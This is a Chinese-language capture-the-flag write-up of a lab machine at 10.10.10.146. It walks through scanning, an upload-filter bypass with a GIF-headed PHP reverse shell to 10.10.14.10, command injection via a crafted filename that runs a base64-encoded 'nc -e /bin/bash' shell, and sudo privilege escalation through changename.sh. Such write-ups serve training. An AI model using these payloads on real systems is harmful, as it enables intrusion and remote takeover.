基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
➜  ~ nmap -sC -sV 10.10.10.146
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-30 01:56 EST
Warning: 10.10.10.146 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.146
Host is up (0.070s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
| 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_ 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

80

80就一段文字:

目录扫描

简单的目录扫描,发现backup和uploads:

1
2
3
4
5
6
7
8
9
gobuster dir -u http://10.10.10.146/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50

/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/backup (Status: 301)
/cgi-bin/ (Status: 403)
/index.php (Status: 200)
/uploads (Status: 301)

backup

backup里有个tar,是4个php文件:

upload && shell

upload就是文件上传,根据backup里的代码,有后缀名校验和文件头校验只能上传图片,但用的php的finfo_file函数,很容易bypass:

Photo.php里可以看到上传后的文件:

shell.gif

1
2
3
4
GIF89a;
<?php
system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.10/4445 <&1'");
?>

reverse shell

然后去访问触发reverse shell:

guly

在guly用户目录可以看到有个check_attack.php,查看代码可以看到是uploads目录进行检测处理,里面有明显的命令注入:

1
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");

value就是文件名,我们可控

命令注入

直接Touch有点问题,可以base64编码:

1
2
3
echo "nc -e /bin/bash 10.10.14.10 4446" | base64
bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjEwIDQ0NDYK
touch '; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjEwIDQ0NDYK | base64 -d | sh; b'

guly shell

然后等待触发,得到guly shell:

check_attack.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
$msg='';
if ($value == 'index.html') {
continue;
}
#echo "-------------\n";

#print "check: $value\n";
list ($name,$ext) = getnameCheck($value);
$check = check_ip($name,$value);

if (!($check[0])) {
echo "attack!\n";
# todo: attach file
file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
mail($to, $msg, $msg, $headers, "-F$value");
}
}

?>

user flag

Guly 用户目录得到user.txt:

提权信息

Sudo -l发现changename.sh:

查看代码,就是调用ifcfg,输入几个变量:

根据这个,变量那里可以直接执行任意命令

changename.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
done
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done

/sbin/ifup guly0

提权 && root flag

所以就可以直接执行bash,得到root:

参考资料